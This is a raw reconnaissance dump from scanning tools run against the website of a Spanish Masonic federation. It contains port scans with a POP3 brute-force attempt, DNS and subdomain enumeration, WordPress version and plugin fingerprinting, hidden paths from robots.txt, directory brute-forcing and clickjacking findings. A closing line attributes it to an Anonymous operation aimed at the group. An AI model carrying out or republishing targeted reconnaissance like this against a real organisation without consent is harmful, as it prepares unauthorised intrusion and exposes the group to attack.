http://elderechohumano.org [301 Moved Permanently] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], RedirectLocation[https://elderechohumano.org/], Title[301 Moved Permanently], nginx
https://elderechohumano.org/ [302 Found] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], Plesk[Lin], RedirectLocation[https://elderechohumano.org/web], Title[302 Found], X-Powered-By[PleskLin], nginx
https://elderechohumano.org/web [301 Moved Permanently] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], Plesk[Lin], RedirectLocation[https://elderechohumano.org/web/], Title[301 Moved Permanently], X-Powered-By[PleskLin], nginx
https://elderechohumano.org/web/ [200 OK] Country[UNITED KINGDOM][GB], HTML5, HTTPServer[nginx], IP[51.255.33.229], JQuery[1.12.4], MetaGenerator[WordPress 4.9.6], Open-Graph-Protocol[website], PHP[5.6.31,], Plesk[Lin], Script[text/javascript], Title[Federación española le droit humain el derecho humano &#8211; Logias españolas de la orden masónica mixta internacional], UncommonHeaders[link], WordPress[4.9.6], X-Powered-By[PHP/5.6.31, PleskLin], nginx, x-pingback[https://elderechohumano.org/web/xmlrpc.php]

	__  ______ _____
	\ \/ / ___|_   _|
	 \  /\___ \ | |
	 /  \ ___) || |
	/_/\_|____/ |_|

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: elderechohumano.org:80
+ -- --=[Site not vulnerable to Cross-Site Tracing!
+ -- --=[Site not vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

HTTP/1.1 405 Not Allowed
Server: nginx
Date: Wed, 23 May 2018 06:25:33 GMT
Content-Type: text/html
Content-Length: 166
Connection: close

<html>
<head><title>405 Not Allowed</title></head>
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx</center>
</body>
</html>

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 23 May 2018 06:25:36 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: https://elderechohumano.org/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
#######################################################################################################################################
+ -- --=[Checking if X-Content options are enabled on elderechohumano.org...

+ -- --=[Checking if X-Frame options are enabled on elderechohumano.org...

+ -- --=[Checking if X-XSS-Protection header is enabled on elderechohumano.org...

+ -- --=[Checking HTTP methods on elderechohumano.org...

+ -- --=[Checking if TRACE method is enabled on elderechohumano.org...

+ -- --=[Checking for META tags on elderechohumano.org...

+ -- --=[Checking for open proxy on elderechohumano.org...
	</div>

	<div id="footer-wrapper">
		<div id="footer">
			This page was generated by <a href="http://www.parallels.com/products/panel/intro">Parallels Plesk</a> <span class="separator">&nbsp;</span> <a class="copyright" href="http://www.parallels.com">&copy; 1999-2014. Parallels IP Holdings GmbH. All rights reserved.</a>
		</div>
	</div>

</body>
</html>

+ -- --=[Enumerating software on elderechohumano.org...
Server: nginx

+ -- --=[Checking if Strict-Transport-Security is enabled on elderechohumano.org...

+ -- --=[Checking for Flash cross-domain policy on elderechohumano.org...
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

+ -- --=[Checking for Silverlight cross-domain policy on elderechohumano.org...
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

+ -- --=[Checking for HTML5 cross-origin resource sharing on elderechohumano.org...

+ -- --=[Retrieving robots.txt on elderechohumano.org...
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

+ -- --=[Retrieving sitemap.xml on elderechohumano.org...
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

+ -- --=[Checking cookie attributes on elderechohumano.org...

+ -- --=[Checking for ASP.NET Detailed Errors on elderechohumano.org...
<BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
   - an error's message is "too small", specifically
   - its own error message. You can turn that off,
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - workaround is pretty simple: pad the error
#######################################################################################################################################
---------------------------------------------------------------------------------------------------------------------------------------

[ ! ] Starting SCANNER INURLBR 2.1 at [23-05-2018 02:27:00]
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-elderechohumano.org.txt  ]
[ INFO ][ DORK ]::[ site:elderechohumano.org ]
[ INFO ][ SEARCHING ]:: {
[ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ug ]

[ INFO ][ SEARCHING ]::
-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE API ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 002901626849897788481:cpnctza84gq ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]

[ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
[ INFO ] Not a satisfactory result was found!


[ INFO ] [ Shutting down ]
[ INFO ] [ End of process INURLBR at [23-05-2018 02:27:20]
[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-elderechohumano.org.txt  ]
|_________________________________________________________________________________________

\_________________________________________________________________________________________/

 + -- --=[Port 110 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:27 EDT
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.42s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu

PORT    STATE SERVICE VERSION
110/tcp open  pop3    Courier pop3d
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 28 guesses in 17 seconds, average tps: 1.6
|_  ERROR: Failed to connect.
|_pop3-capabilities: PIPELINING TOP APOP UIDL SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256) IMPLEMENTATION(Courier Mail Server) STLS LOGIN-DELAY(10)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: localhost.localdomain

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   480.50 ms 229.ip-51-255-33.eu (51.255.33.229)
#######################################################################################################################################

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://elderechohumano.org
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 13
#######################################################################################################################################
	__  ______ _____
	\ \/ / ___|_   _|
	 \  /\___ \ | |
	 /  \ ___) || |
	/_/\_|____/ |_|

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: elderechohumano.org:443
+ -- --=[Site not vulnerable to Cross-Site Tracing!
+ -- --=[Site not vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

HTTP/1.1 405 Not Allowed
Server: nginx
Date: Wed, 23 May 2018 06:28:34 GMT
Content-Type: text/html
Content-Length: 166
Connection: close

<html>
<head><title>405 Not Allowed</title></head>
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx</center>
</body>
</html>

HTTP/1.1 400 Bad Request
Server: nginx
Date: Wed, 23 May 2018 06:28:37 GMT
Content-Type: text/html
Content-Length: 264
Connection: close

<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
<hr><center>nginx</center>
</body>
</html>
#######################################################################################################################################
+ -- --=[Checking if X-Content options are enabled on elderechohumano.org...

+ -- --=[Checking if X-Frame options are enabled on elderechohumano.org...

+ -- --=[Checking if X-XSS-Protection header is enabled on elderechohumano.org...

+ -- --=[Checking HTTP methods on elderechohumano.org...

+ -- --=[Checking if TRACE method is enabled on elderechohumano.org...

+ -- --=[Checking for META tags on elderechohumano.org...

+ -- --=[Checking for open proxy on elderechohumano.org...

+ -- --=[Enumerating software on elderechohumano.org...
server: nginx
x-powered-by: PleskLin

+ -- --=[Checking if Strict-Transport-Security is enabled on elderechohumano.org...

+ -- --=[Checking for Flash cross-domain policy on elderechohumano.org...
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - enough to make Internet Explorer happy. The
   - workaround is pretty simple: pad the error
   - message with a big comment like this to push it
   - over the five hundred and twelve bytes minimum.
   - Of course, that's exactly what you're reading
   - right now.
   -->

+ -- --=[Checking for Silverlight cross-domain policy on elderechohumano.org...
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - enough to make Internet Explorer happy. The
   - workaround is pretty simple: pad the error
   - message with a big comment like this to push it
   - over the five hundred and twelve bytes minimum.
   - Of course, that's exactly what you're reading
   - right now.
   -->

+ -- --=[Checking for HTML5 cross-origin resource sharing on elderechohumano.org...

+ -- --=[Retrieving robots.txt on elderechohumano.org...
Disallow: /biblioteca/
Disallow: /admin/
Disallow: /mail/
Disallow: /Maes/
Disallow: /secretaria/
Disallow: /venerables/
Disallow: /gestion/
Allow: /


+ -- --=[Retrieving sitemap.xml on elderechohumano.org...
<url>
  <loc>http://www.elderechohumano.org/index.php?seccion=82&amp;pagina=1</loc>
</url>
<url>
  <loc>http://www.elderechohumano.org/index.php?seccion=82&amp;id=7&amp;accion=detalleNoticia</loc>
</url>
<url>
  <loc>http://www.elderechohumano.org/index.php?seccion=82&amp;id=4&amp;accion=detalleNoticia</loc>
</url>
</urlset>
+ -- --=[Checking cookie attributes on elderechohumano.org...

+ -- --=[Checking for ASP.NET Detailed Errors on elderechohumano.org...
<BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
   - an error's message is "too small", specifically
   - its own error message. You can turn that off,
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - workaround is pretty simple: pad the error
<BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
   - an error's message is "too small", specifically
   - its own error message. You can turn that off,
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - workaround is pretty simple: pad the error
#######################################################################################################################################


 AVAILABLE PLUGINS
 -----------------

  PluginCertInfo
  PluginSessionRenegotiation
  PluginHeartbleed
  PluginOpenSSLCipherSuites
  PluginCompression
  PluginSessionResumption
  PluginChromeSha1Deprecation
  PluginHSTS


 CHECKING HOST(S) AVAILABILITY
 -----------------------------

   elderechohumano.org:443             => 51.255.33.229:443


 SCAN RESULTS FOR ELDERECHOHUMANO.ORG:443 - 51.255.33.229:443
 ------------------------------------------------------------

  * Deflate Compression:
      OK - Compression disabled

  * Session Renegotiation:
      Client-initiated Renegotiations:   OK - Rejected
      Secure Renegotiation:              OK - Supported

  * Certificate - Content:
      SHA1 Fingerprint:                  e5f63766c85b8e75a4db072309cb6b255a8034ff
      Common Name:                       elderechohumano.org
      Issuer:                            Let's Encrypt Authority X3
      Serial Number:                     03919C2A49B013A9DB157AE36B4919656E40
      Not Before:                        Apr 23 15:58:13 2018 GMT
      Not After:                         Jul 22 15:58:13 2018 GMT
      Signature Algorithm:               sha256WithRSAEncryption
      Public Key Algorithm:              rsaEncryption
      Key Size:                          2048 bit
      Exponent:                          65537 (0x10001)
      X509v3 Subject Alternative Name:   {'DNS': ['elderechohumano.org', 'logiaferreriguardiadh.org.es', 'www.elderechohumano.org', 'www.logiaferreriguardiadh.org.es']}

  * Certificate - Trust:
      Hostname Validation:               OK - Subject Alternative Name matches
      Google CA Store (09/2015):         FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
      Java 6 CA Store (Update 65):       OK - Certificate is trusted
      Microsoft CA Store (09/2015):      OK - Certificate is trusted
      Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
      Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
      Certificate Chain Received:        ['elderechohumano.org', "Let's Encrypt Authority X3"]

  * Certificate - OCSP Stapling:
      NOT SUPPORTED - Server did not send back an OCSP response.

  * SSLV2 Cipher Suites:
      Server rejected all cipher suites.

  * Session Resumption:
      With Session IDs:                  NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
      With TLS Session Tickets:          OK - Supported

  * SSLV3 Cipher Suites:
      Server rejected all cipher suites.


 SCAN COMPLETED IN 10.38 S
 -------------------------
Version: 1.11.11-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 51.255.33.229

Testing SSL server elderechohumano.org on port 443 using SNI name elderechohumano.org

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
Accepted  TLSv1.2  128 bits  AES128-SHA256
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  256 bits  AES256-SHA
Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA
Preferred TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  AES128-SHA
Accepted  TLSv1.1  256 bits  AES256-SHA
Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA
Preferred TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  elderechohumano.org
Altnames: DNS:elderechohumano.org, DNS:logiaferreriguardiadh.org.es, DNS:www.elderechohumano.org, DNS:www.logiaferreriguardiadh.org.es
Issuer:   Let's Encrypt Authority X3

Not valid before: Apr 23 15:58:13 2018 GMT
Not valid after:  Jul 22 15:58:13 2018 GMT
#######################################################################################################################################
[*] Performing General Enumeration of Domain: elderechohumano.org
[-] DNSSEC is not configured for elderechohumano.org
[*] 	 SOA sdns2.ovh.net 213.251.188.141
[*] 	 NS vps435959.ovh.net 51.255.33.229
[*] 	 Bind Version for 51.255.33.229 none
[*] 	 NS sdns2.ovh.net 213.251.188.141
[*] 	 Bind Version for 213.251.188.141 [Secured]
[*] 	 MX mail.elderechohumano.org 51.255.33.229
[*] 	 A elderechohumano.org 51.255.33.229
[*] 	 TXT elderechohumano.org v=spf1 +a +mx -all
[*] 	 TXT _domainkey.elderechohumano.org o=-
[*] Enumerating SRV Records
[-] No SRV Records Found for elderechohumano.org
[+] 0 Records Found
#######################################################################################################################################
[*] Processing domain elderechohumano.org
[+] Getting nameservers
213.251.188.141 - sdns2.ovh.net
51.255.33.229 - vps435959.ovh.net
[-] Zone transfer failed

[+] TXT records found
"v=spf1 +a +mx -all"

[+] MX records found, added to target list
10 mail.elderechohumano.org.

[*] Scanning elderechohumano.org for A records
51.255.33.229 - elderechohumano.org
51.255.33.229 - ftp.elderechohumano.org
51.255.33.229 - imap.elderechohumano.org
51.255.33.229 - mail.elderechohumano.org
51.255.33.229 - ns.elderechohumano.org
51.255.33.229 - pop.elderechohumano.org
51.255.33.229 - pop3.elderechohumano.org
51.255.33.229 - smtp.elderechohumano.org
51.255.33.229 - webmail.elderechohumano.org
51.255.33.229 - www.elderechohumano.org

#######################################################################################################################################
Original*      elderechohumano.org      51.255.33.229 NS:sdns2.ovh.net MX:mail.elderechohumano.org
Subdomain      elderecho.humano.org     88.214.194.86
Subdomain      elderechohu.mano.org     69.172.201.153 NS:ns1.uniregistrymarket.link
Subdomain      elderechohum.ano.org     210.249.74.117 NS:ns3.funcy.com MX:ms4.funcy.com
Subdomain      elderechohuman.o.org     50.63.46.1 NS:A.SERVICE.AFILIASDNS.INFO
#######################################################################################################################################
Ip Address	Status	Type	Domain Name			Server
----------	------	----	-----------			------
51.255.33.229   200     alias   ftp.elderechohumano.org		nginx
51.255.33.229	200	host	elderechohumano.org		nginx
51.255.33.229   200     host    imap.elderechohumano.org	nginx
51.255.33.229   200     host    mail.elderechohumano.org	nginx
51.255.33.229   200     host    ns.elderechohumano.org		nginx
51.255.33.229   200     host    pop.elderechohumano.org		nginx
51.255.33.229   200     host    pop3.elderechohumano.org	nginx
51.255.33.229   200     host    smtp.elderechohumano.org	nginx
51.255.33.229   302     host    webmail.elderechohumano.org	nginx
51.255.33.229   301     alias   www.elderechohumano.org		nginx
51.255.33.229	301	host	elderechohumano.org		nginx
#######################################################################################################################################
[+] URL: https://elderechohumano.org/web/
[+] Started: Wed May 23 03:09:38 2018

[!] The WordPress 'https://elderechohumano.org/web/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <https://elderechohumano.org/web/wp-json/>; rel="https://api.w.org/", <https://wp.me/P4jvyk-a>; rel=shortlink
[+] Interesting header: SERVER: nginx
[+] Interesting header: X-POWERED-BY: PHP/5.6.31
[+] Interesting header: X-POWERED-BY: PleskLin
[+] XML-RPC Interface available under: https://elderechohumano.org/web/xmlrpc.php

[+] WordPress version 4.9.6 (Released on 2018-05-17) identified from readme, links opml, stylesheets numbers, advanced fingerprinting, meta generator

[+] WordPress theme in use: mantra - v2.6.1.1

[+] Name: mantra - v2.6.1.1
 |  Last updated: 2018-01-22T00:00:00.000Z
 |  Location: https://elderechohumano.org/web/wp-content/themes/mantra/
 |  Readme: https://elderechohumano.org/web/wp-content/themes/mantra/readme.txt
[!] The version is out of date, the latest version is 3.0.4
 |  Style URL: https://elderechohumano.org/web/wp-content/themes/mantra/style.css
 |  Theme Name: Mantra
 |  Theme URI: https://www.cryoutcreations.eu/wordpress-themes/mantra
 |  Description: Mantra is a do-it-yourself WordPress theme, featuring a pack of over 100 customization options an...
 |  Author: Cryout Creations
 |  Author URI: https://www.cryoutcreations.eu

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: jetpack - v6.1
 |  Last updated: 2018-05-22T21:44:00.000Z
 |  Location: https://elderechohumano.org/web/wp-content/plugins/jetpack/
 |  Readme: https://elderechohumano.org/web/wp-content/plugins/jetpack/readme.txt
 |  Changelog: https://elderechohumano.org/web/wp-content/plugins/jetpack/changelog.txt
[!] The version is out of date, the latest version is 6.1.1
#######################################################################################################################################
--------------------------------------------------------------------------------------------------------------------------------------
+ Target IP:          51.255.33.229
+ Target Hostname:    elderechohumano.org
+ Target Port:        443
---------------------------------------------------------------------------------------------------------------------------------------
+ SSL Info:        Subject:  /CN=elderechohumano.org
                   Ciphers:  ECDHE-RSA-AES128-GCM-SHA256
                   Issuer:   /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
+ Start Time:         2018-05-23 03:13:23 (GMT-4)
---------------------------------------------------------------------------------------------------------------------------------------
+ Server: nginx
+ Retrieved x-powered-by header: PleskLin
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://elderechohumano.org/web
+ Server leaks inodes via ETags, header found with file /aOM2omfL.old, fields: 0x405 0x4e40c6af4a100
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: : Invalid argument
+ Scan terminated:  20 error(s) and 6 item(s) reported on remote host
+ End Time:           2018-05-23 03:33:49 (GMT-4) (1226 seconds)
---------------------------------------------------------------------------------------------------------------------------------------
#######################################################################################################################################
======================================================================================================================================
| [*] http://elderechohumano.org/ redirected to http://elderechohumano.org/web/
| [*] New target is: http://elderechohumano.org/web/
=======================================================================================================================================
| Domain: http://elderechohumano.org/web/
| Server: nginx
| IP: 51.255.33.229
=======================================================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://elderechohumano.org/web/ad/
| [+] CODE: 200 URL: http://elderechohumano.org/web/admin/
| [+] CODE: 200 URL: http://elderechohumano.org/web/ap/
| [+] CODE: 200 URL: http://elderechohumano.org/web/at/
| [+] CODE: 200 URL: http://elderechohumano.org/web/biblioteca/
| [+] CODE: 200 URL: http://elderechohumano.org/web/biblio/
| [+] CODE: 200 URL: http://elderechohumano.org/web/comunicado/
| [+] CODE: 200 URL: http://elderechohumano.org/web/conf/
| [+] CODE: 200 URL: http://elderechohumano.org/web/conferen/
| [+] CODE: 200 URL: http://elderechohumano.org/web/cont/
| [+] CODE: 200 URL: http://elderechohumano.org/web/conta/
| [+] CODE: 200 URL: http://elderechohumano.org/web/contact/
| [+] CODE: 200 URL: http://elderechohumano.org/web/de/
| [+] CODE: 200 URL: http://elderechohumano.org/web/di/
| [+] CODE: 200 URL: http://elderechohumano.org/web/embed/
| [+] CODE: 200 URL: http://elderechohumano.org/web/en/
| [+] CODE: 200 URL: http://elderechohumano.org/web/enlaces/
| [+] CODE: 200 URL: http://elderechohumano.org/web/entrevista/
| [+] CODE: 200 URL: http://elderechohumano.org/web/es/
| [+] CODE: 200 URL: http://elderechohumano.org/web/espanol/
| [+] CODE: 200 URL: http://elderechohumano.org/web/esp/
| [+] CODE: 200 URL: http://elderechohumano.org/web/feed/
| [+] CODE: 200 URL: http://elderechohumano.org/web/fe/
| [+] CODE: 200 URL: http://elderechohumano.org/web/historia/
| [+] CODE: 200 URL: http://elderechohumano.org/web/hist/
| [+] CODE: 200 URL: http://elderechohumano.org/web/home/
| [+] CODE: 200 URL: http://elderechohumano.org/web/in/
| [+] CODE: 200 URL: http://elderechohumano.org/web/inicio/
| [+] CODE: 200 URL: http://elderechohumano.org/web/int/
| [+] CODE: 200 URL: http://elderechohumano.org/web/intern/
| [+] CODE: 200 URL: http://elderechohumano.org/web/interna/
| [+] CODE: 200 URL: http://elderechohumano.org/web/laicismo/
| [+] CODE: 200 URL: http://elderechohumano.org/web/log/
| [+] CODE: 200 URL: http://elderechohumano.org/web/login/
| [+] CODE: 200 URL: http://elderechohumano.org/web/noticias/
| [+] CODE: 200 URL: http://elderechohumano.org/web/noticia/
| [+] CODE: 200 URL: http://elderechohumano.org/web/of/
| [+] CODE: 200 URL: http://elderechohumano.org/web/po/
| [+] CODE: 200 URL: http://elderechohumano.org/web/re/
| [+] CODE: 200 URL: http://elderechohumano.org/web/rss/
| [+] CODE: 200 URL: http://elderechohumano.org/web/visit/
| [+] CODE: 200 URL: http://elderechohumano.org/web/wp-admin/
=======================================================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://elderechohumano.org/web/admin/index.php
| [+] CODE: 200 URL: http://elderechohumano.org/web/index.php
| [+] CODE: 200 URL: http://elderechohumano.org/web/license.txt
| [+] CODE: 200 URL: http://elderechohumano.org/web/readme.html
| [+] CODE: 200 URL: http://elderechohumano.org/web/search/htx/sqlqhit.asp
| [+] CODE: 200 URL: http://elderechohumano.org/web/search/htx/SQLQHit.asp
| [+] CODE: 200 URL: http://elderechohumano.org/web/search/sqlqhit.asp
| [+] CODE: 200 URL: http://elderechohumano.org/web/search/SQLQHit.asp
=======================================================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
=======================================================================================================================================
|
| Crawler Started:
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| [+] Crawling finished, 34 URL's found!
|
| PHPinfo() Disclosure:
|
| External hosts:
| [+] External Host Found: http://codex.wordpress.org
| [+] External Host Found: http://planet.wordpress.org
| [+] External Host Found: http://www.mysql.com
| [+] External Host Found: https://droit-humain.org
| [+] External Host Found: http://es.forums.wordpress.org
| [+] External Host Found: https://fmd.es
| [+] External Host Found: http://www.elolivoylaacacia.ml
| [+] External Host Found: https://s0.wp.com
| [+] External Host Found: http://auzolan.org.es
| [+] External Host Found: https://wp.me
| [+] External Host Found: https://wordpress.org
| [+] External Host Found: http://php.net
| [+] External Host Found: http://wordpress.org
| [+] External Host Found: http://httpd.apache.org
| [+] External Host Found: http://droit-humain.org
| [+] External Host Found: https://gmpg.org
| [+] External Host Found: https://auzolan.org.es
| [+] External Host Found: https://secure.gravatar.com
#######################################################################################################################################
                                             Anonymous #OPKilluminatie JTSEC Full Recon #3 2018